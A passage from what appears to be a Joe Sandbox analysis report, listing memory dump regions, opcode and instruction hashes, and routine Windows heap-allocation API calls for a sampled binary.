                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 3$3
                                      • API String ID: 0-2538865259
                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction ID: 6a1b9dc1803faafaf6e58c2a64f691cfc11a786924436772f77c7bc4760ac46e
                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                      • Instruction Fuzzy Hash: 56013CFFD095838AF3597B60D8842B8FA60BF80F1DFDC4939C41E015A1DF2C6485A660
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction ID: 249c2fd2851999f46b1e78e4f027ebbc0ec1d47b42b9ae21bdae294c4d01dafb
                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                      • Instruction Fuzzy Hash: 124168BBA0964386EA55AB10E44417EF7A4EF85F98BCC8038CA4E17794DF3DE840C760